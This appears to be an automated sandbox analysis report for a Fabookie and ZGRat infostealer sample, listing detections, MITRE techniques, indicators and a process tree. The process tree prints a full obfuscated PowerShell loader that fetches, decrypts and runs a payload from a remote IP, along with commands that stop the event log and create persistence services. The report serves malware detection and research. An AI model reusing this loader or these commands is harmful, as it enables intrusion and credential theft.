fabookie | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Analysis

max time kernel
44s
max time network
1799s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
29-01-2024 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

fabookie zgrat discovery evasion persistence rat spyware stealer

Malware Config

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/1968-1630-0x0000000003530000-0x000000000365C000-memory.dmp	family_fabookie
behavioral1/memory/1968-1630-0x0000000003530000-0x000000000365C000-memory.dmp	family_fabookie

Detect ZGRat V1 10 IoCs

resource	yara_rule
behavioral1/memory/2472-534-0x0000000000110000-0x0000000000614000-memory.dmp	family_zgrat_v1
behavioral1/memory/2036-586-0x0000000004B40000-0x0000000004D48000-memory.dmp	family_zgrat_v1
behavioral1/memory/844-842-0x0000000000B50000-0x0000000001054000-memory.dmp	family_zgrat_v1
behavioral1/memory/1048-1234-0x00000000011D0000-0x00000000014B2000-memory.dmp	family_zgrat_v1
behavioral1/memory/2328-1399-0x0000000000F90000-0x0000000001324000-memory.dmp	family_zgrat_v1
behavioral1/memory/2472-534-0x0000000000110000-0x0000000000614000-memory.dmp	family_zgrat_v1
behavioral1/memory/2036-586-0x0000000004B40000-0x0000000004D48000-memory.dmp	family_zgrat_v1
behavioral1/memory/844-842-0x0000000000B50000-0x0000000001054000-memory.dmp	family_zgrat_v1
behavioral1/memory/1048-1234-0x00000000011D0000-0x00000000014B2000-memory.dmp	family_zgrat_v1
behavioral1/memory/2328-1399-0x0000000000F90000-0x0000000001324000-memory.dmp	family_zgrat_v1

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
12	1392	powershell.exe
12	1392	powershell.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1168-696-0x0000000000800000-0x0000000000D6C000-memory.dmp	net_reactor
behavioral1/memory/1168-696-0x0000000000800000-0x0000000000D6C000-memory.dmp	net_reactor

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe

Executes dropped EXE 16 IoCs

pid	Process
3000	gookcom.exe
1260	crypted.exe
2504	art33.exe
2896	sunset1.exe
268	dart.exe
956	syncUpd.exe
924	Opolis.exe
2724	sc.exe
3000	gookcom.exe
1260	crypted.exe
2504	art33.exe
2896	sunset1.exe
268	dart.exe
956	syncUpd.exe
924	Opolis.exe
2724	sc.exe

Loads dropped DLL 32 IoCs

pid	Process
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
2896	sunset1.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
956	syncUpd.exe
956	syncUpd.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
2896	sunset1.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
1448	4363463463464363463463463.exe
956	syncUpd.exe
956	syncUpd.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\sc.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sc.exe"	sc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\sc.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sc.exe"	sc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
426	raw.githubusercontent.com
757	raw.githubusercontent.com
15	raw.githubusercontent.com
90	bitbucket.org
91	bitbucket.org
117	raw.githubusercontent.com
186	raw.githubusercontent.com
43	drive.google.com
165	raw.githubusercontent.com
270	raw.githubusercontent.com
16	raw.githubusercontent.com
44	drive.google.com
302	raw.githubusercontent.com
427	raw.githubusercontent.com
675	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
726	ip-api.com
730	api.ipify.org
756	ip-api.com
381	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1260 set thread context of 1780	1260	crypted.exe	33
PID 1260 set thread context of 1780	1260	crypted.exe	279

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1304	sc.exe
2340	sc.exe
1496	sc.exe
1304	sc.exe
2340	sc.exe
1424	sc.exe
2724	sc.exe
1496	sc.exe
1424	sc.exe
2724	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
2288	1780	WerFault.exe	33
2584	1752	WerFault.exe	110
880	1168	WerFault.exe	81
1224	2340	WerFault.exe	62
3160	1492	WerFault.exe	166
2288	1780	WerFault.exe	279
2584	1752	WerFault.exe	356
880	1168	WerFault.exe	327
1224	2340	WerFault.exe	308
3160	1492	WerFault.exe	412

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	syncUpd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	syncUpd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	syncUpd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	syncUpd.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2672	schtasks.exe
452	schtasks.exe
452	schtasks.exe
2792	schtasks.exe
3428	schtasks.exe
3488	schtasks.exe
3156	schtasks.exe
3428	schtasks.exe
3488	schtasks.exe
2792	schtasks.exe
2672	schtasks.exe
3156	schtasks.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
2440	timeout.exe
3276	timeout.exe
2440	timeout.exe
3276	timeout.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
3804	tasklist.exe
2808	tasklist.exe
3804	tasklist.exe
2808	tasklist.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3744	PING.EXE
3744	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
1392	powershell.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
956	syncUpd.exe
956	syncUpd.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
1392	powershell.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe
3000	gookcom.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1448	4363463463464363463463463.exe
Token: SeDebugPrivilege	3000	gookcom.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	1260	crypted.exe
Token: SeDebugPrivilege	1448	4363463463464363463463463.exe
Token: SeDebugPrivilege	3000	gookcom.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	1260	crypted.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
924	Opolis.exe
924	Opolis.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	29
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	29
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	29
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	29
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	29
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	29
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	29
PID 3000 wrote to memory of 1392	3000	gookcom.exe	30
PID 3000 wrote to memory of 1392	3000	gookcom.exe	30
PID 3000 wrote to memory of 1392	3000	gookcom.exe	30
PID 3000 wrote to memory of 1392	3000	gookcom.exe	30
PID 1448 wrote to memory of 1260	1448	4363463463464363463463463.exe	32
PID 1448 wrote to memory of 1260	1448	4363463463464363463463463.exe	32
PID 1448 wrote to memory of 1260	1448	4363463463464363463463463.exe	32
PID 1448 wrote to memory of 1260	1448	4363463463464363463463463.exe	32
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1260 wrote to memory of 1780	1260	crypted.exe	33
PID 1780 wrote to memory of 2288	1780	RegAsm.exe	34
PID 1780 wrote to memory of 2288	1780	RegAsm.exe	34
PID 1780 wrote to memory of 2288	1780	RegAsm.exe	34
PID 1780 wrote to memory of 2288	1780	RegAsm.exe	34
PID 1448 wrote to memory of 2504	1448	4363463463464363463463463.exe	35
PID 1448 wrote to memory of 2504	1448	4363463463464363463463463.exe	35
PID 1448 wrote to memory of 2504	1448	4363463463464363463463463.exe	35
PID 1448 wrote to memory of 2504	1448	4363463463464363463463463.exe	35
PID 1448 wrote to memory of 2896	1448	4363463463464363463463463.exe	36
PID 1448 wrote to memory of 2896	1448	4363463463464363463463463.exe	36
PID 1448 wrote to memory of 2896	1448	4363463463464363463463463.exe	36
PID 1448 wrote to memory of 2896	1448	4363463463464363463463463.exe	36
PID 1448 wrote to memory of 268	1448	4363463463464363463463463.exe	37
PID 1448 wrote to memory of 268	1448	4363463463464363463463463.exe	37
PID 1448 wrote to memory of 268	1448	4363463463464363463463463.exe	37
PID 1448 wrote to memory of 268	1448	4363463463464363463463463.exe	37
PID 1448 wrote to memory of 956	1448	4363463463464363463463463.exe	38
PID 1448 wrote to memory of 956	1448	4363463463464363463463463.exe	38
PID 1448 wrote to memory of 956	1448	4363463463464363463463463.exe	38
PID 1448 wrote to memory of 956	1448	4363463463464363463463463.exe	38
PID 1448 wrote to memory of 924	1448	4363463463464363463463463.exe	41
PID 1448 wrote to memory of 924	1448	4363463463464363463463463.exe	41
PID 1448 wrote to memory of 924	1448	4363463463464363463463463.exe	41
PID 1448 wrote to memory of 924	1448	4363463463464363463463463.exe	41
PID 1448 wrote to memory of 2724	1448	4363463463464363463463463.exe	42
PID 1448 wrote to memory of 2724	1448	4363463463464363463463463.exe	42
PID 1448 wrote to memory of 2724	1448	4363463463464363463463463.exe	42
PID 1448 wrote to memory of 2724	1448	4363463463464363463463463.exe	42
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	275
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	275
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	275
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	275
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	275
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	275
PID 1448 wrote to memory of 3000	1448	4363463463464363463463463.exe	275

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2792	attrib.exe
2792	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1392
- C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 252
      4⤵
      Program crash
      PID:2288
- C:\Users\Admin\AppData\Local\Temp\Files\art33.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\art33.exe"
  2⤵
  - Executes dropped EXE
  PID:2504
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "EUJBTPMK"
    3⤵
    - Launches sc.exe
    PID:1496
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1304
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "EUJBTPMK" binpath= "C:\ProgramData\qrabctnrcogv\uyzpsnbeowaz.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2340
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 92
      4⤵
      Program crash
      PID:1224
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "EUJBTPMK"
    3⤵
    - Launches sc.exe
    PID:1424
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:1440
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:992
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:1432
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:688
- C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2896
- C:\Users\Admin\AppData\Local\Temp\Files\dart.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dart.exe"
  2⤵
  - Executes dropped EXE
  PID:268
- C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:956
- C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:924
- - C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"
    3⤵
    PID:2132
- C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Launches sc.exe
  PID:2724
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
